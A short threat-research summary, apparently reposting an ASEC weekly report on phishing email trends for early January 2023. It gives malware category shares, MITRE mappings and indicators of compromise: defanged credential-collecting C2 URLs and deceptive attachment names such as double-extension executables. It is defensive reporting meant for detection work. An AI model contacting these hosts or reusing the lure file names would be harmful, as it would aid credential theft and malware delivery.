Threat Research

ASEC Weekly Phishing Email Threat Trends (January 1st, 2023 – January 7th, 2023) – ASEC BLOG

Securonix

ASEC’s weekly phishing threat analysis for Jan 1–7, 2023 shows phishing email attachments as the dominant attack vector, with FakePage pages designed to harvest credentials, followed by Worm, Infostealer, and Downloader campaigns. The report also highlights MOTW-based bypass techniques, attacker C2 URLs, and practical user guidance to prevent infection from phishing emails.
#FakePage #MOTW #AgentTesla #FormBook #Remcos #cortinasdivinas #masjidsalaam #formspree #gojobs

Keypoints

  • FakePage attachments dominated phishing activity at 58% of the observed cases.
  • Worm was the second-most prevalent at 15%, notable for using SMTP to mass-distribute emails.
  • Infostealer and downloader each accounted for 8%; AgentTesla and FormBook are cited as examples of infostealers, Remcos as a downloader.
  • Ransomware (7%) and Trojan (4%) were also detected among phishing attachments.
  • Compressed file variants (RAR/ZIP, etc.) comprised about 43% of attachment types.
  • The report notes MOTW (Mark-of-the-Web) bypass techniques and suggests using MOTW-supporting archivers to curb infection.

MITRE Techniques

  • [T1598] Phishing for Information – Used to obtain credentials via fake login pages; “When users enter their IDs and passwords on the login pages among the FakePages created by the threat actor, their information is sent to the attacker’s server.”
  • [T1566] Phishing – Initial Access – Delivery via phishing emails with attachments carrying malware; “Phishing (Initial Access, ID: TI1566)”
  • [T1534] Internal Spearphishing – Lateral Movement – Targeted internal phishing efforts facilitating movement within an organization; “Internal Spearphishing (Lateral Movement, ID: T1534)”

Indicators of Compromise

  • [URL] Fake Page C2 addresses used to exfiltrate credentials – hxxps://cortinasdivinas.com/wp-admin/NEW/anydomain.php, hxxps://masjidsalaam.co.ke/wp-project/anydomain.php
  • [URL] Additional C2/phishing-related domains mentioned – hxxps://formspree.io/f/xdovnyrz, hxxps://gojobs.in/xzx/dhl.php
  • [File Name] Attachments observed in cases – Original-invoice_username.htm, Shipment-AWB-6588476487.html
  • [File Name] Malware payloads and risky attachments – Aviso de pago.pdf.img, PE22142554.rar, wild-imgs.jpg.exe, privateimg.jpg.scr
  • [File Extension] Notable extensions observed – RAR, EXE, SCR, PDF

Read more: https://asec.ahnlab.com/en/45693/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint